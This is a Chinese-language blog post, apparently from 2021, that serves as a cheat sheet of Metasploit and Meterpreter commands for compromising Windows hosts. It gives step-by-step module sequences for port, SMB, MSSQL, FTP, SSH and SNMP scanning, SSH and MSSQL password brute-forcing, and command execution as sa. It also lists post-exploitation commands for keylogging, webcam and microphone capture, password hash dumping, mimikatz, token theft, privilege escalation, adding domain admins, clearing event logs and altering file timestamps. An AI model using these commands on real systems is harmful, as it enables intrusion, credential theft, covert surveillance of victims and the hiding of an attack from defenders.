meterpreter常用命令

sessions -l 查看会话

backgroud 暂时退出当前会话

注入进程:

ps 查看进程
migrate 注入进程 进程ID 一般选择explorer.exe对应的PID
run vnc 查看远程桌面

文件操作

cat 查看文件
edit 编辑文件
upload 上传文件
download 下载文件
rm 删除文件
mkdir 创建文件夹
rmdir 删除文件夹

网络及系统操作

enumdesktops 在线用户数
uictl disable keyboard 让键盘失效 
uictl enable keyboard 恢复键盘	
record_mic -d 10 音频录制	录制10秒	
webcam_stream 开启摄像头
getsystem 获取最高权限
hashdump 密码hash
sysinfo  查看系统命令
screenshot 截图 
run checkvm 查看是否是虚拟机 
getuid 查看运行木马的用户 
migrate pid //注入到进程 成功会提示successfully
meterpreter > load mimikatz meterpreter > wdigest //加载mimikatz模块 需要system权限
meterpreter> run post/windows/capture/keylog_recorder #获取键盘记录,运行键盘记录模块,他自己创建本文。

特定扫描

扫描端口

use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
exploit

smb_version 模块

smb_version 模块: 
msf> use auxiliary/scanner/smb/smb_version 
show options 
set RHOSTS 192.168.1.111 
run 

查找mssql 主机

msf> use auxiliary/scanner/mssql/mssql_ping 
show options 
set RHOSTS 192.168.1.0/24 
set THREADS 255 
run 

SSH 服务器扫描

msf> use auxiliary/scanner/ssh/ssh_version 
set THREADS 50 
run

FTP 主机扫描

msf> use auxiliary/scanner/ftp/ftp_version 
show options 
set RHOSTS 192.168.1.0/24 
set THREADS 255 
run 

扫描FTP 匿名登录

use auxiliary/scanner/ftp/anonymos 
set RHOSTS 192.168.1.0/24 
set THREADS 50 
run

扫描SNMP 主机

msf> use auxiliary/scanner/snmp/snmp_login 
set RHOSTS 192.168.1.0/24 
set THREADS 50 
run

mssql开发利用

1.对各个ip是否有mssql服务的探测
use scanner/mssql/mssql_ping //测试MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit
2.对扫描到的ip进行爆破
use scanner/mssql/mssql_login //具体配置show options。
3.sa权限对其利用
use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set CMD cmd.exe /c echo hello
exploit

爆破ssh模块

use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file /root/pass.txt //加载字典,可以收集密码做字典
set threads 50
run

通过nmap扫描基本漏洞

msf > nmap –script=vuln 受害靶机ip地址
msf > nmap –script=mysql-info 192.168.0.4 //扫描mysql数据库信息 版本 等..

MSFconsole Commands

show exploits 查看所有exploit 
show payloads 查看所有payload 
show auxiliary 查看所有auxiliary 
search name 搜索exploit 等 
info 查看加载模块的信息 
use name 加载模块 
LHOST 本机IP 
RHOST 目标IP 
set function 设置选项值 
setg function 全局设置 
show options 查看选项 
show targets 查看exp 可选的平台 
set target num 设置exp 作用平台 
set payload payload 设置payload 
show advanced 查看高级选项 
set autorunscript migrate -f 设置自动执行指令 
check 测试是否可利用 
exploit 执行exp 或模块 
exploit -j 作为后台执行 
exploit -z 成功后不立即打开session 
exploit -e encoder 指定encoder 
exploit -h 查看帮助信息 
sessions -l -v 列出可用sessions 详细信息 
sessions -s script 在指定session 执行脚本 
sessions -K 结束session 
sessions -c cmd 执行指定命令 
sessions -u sessionID 升级shell 
db_create name 创建数据库 
db_connect name 连接数据库 
db_nmap nmap 扫描并导入结果 
db_autopwn -h 查看autopwn 帮助 
db_autopwn -p -r -e 基于端口,反弹shell 
db_destroy 删除数据库

Meterpreter Commands

help 查看帮助 
run scriptname 运行脚本 
sysinfo 系统基本信息 
ls 列目录 
use priv 运行提权组件 
ps 列进程 
migrate PID PID 迁移 
use incognito token 窃取 
list_tokens -u 查看可用用户token 
list_tokens -g 查看可用组token 
impersonate_token DOMAIN_NAME\USERNAME 模仿token 
steal_token PID 窃取PID 所属token 并模仿 
drop_token 停止模仿token 
getsystem 获取SYSTEM 权限 
shell 运行shell 
execute -f cmd.exe -i 交互式运行cmd 
execute -f cmd.exe -i -t 使用可用token 运行 
execute -f cmd.exe -i -H -t 同上,同时隐藏进程 
rev2self 返回至初始用户 
reg command 修改注册表 
setkesktop number 切换至另一已登录用户屏幕 
screenshot 截屏 
upload file 上传文件 
download file 下载文件 
keyscan_start 开始截取击键记录 
keyscan_stop 停止截取击键记录 
getprivs 尽可能提升权限 
uictl enable keyboard/mouse 获取键盘或鼠标的控制权 
background 将当前meterpreter shell 转入后台 
hashdump 导出所有用户hash 
use sniffer 加载嗅探模块 
sniffer_interfaces 查看可用网卡接口 
sniffer_dump interfaceID pcapname 开始嗅探 
sniffer_start interfaceID packet-buffer 指定buffer 范围嗅探 
sniffer_stats interfaceID 抓取统计信息 
sniffer_stop interfaceID 停止嗅探 
add_user username password -h ip 添加用户 
add_group_user “Domain Admins” username -h ip 添加用户至管理组 
clearev 清空日志 
timestomp 改变文件属性如创建时间等 
reboot 重启

posted on 2021-05-18 11:49  tech_lee  阅读(533)  评论(0编辑  收藏  举报

导航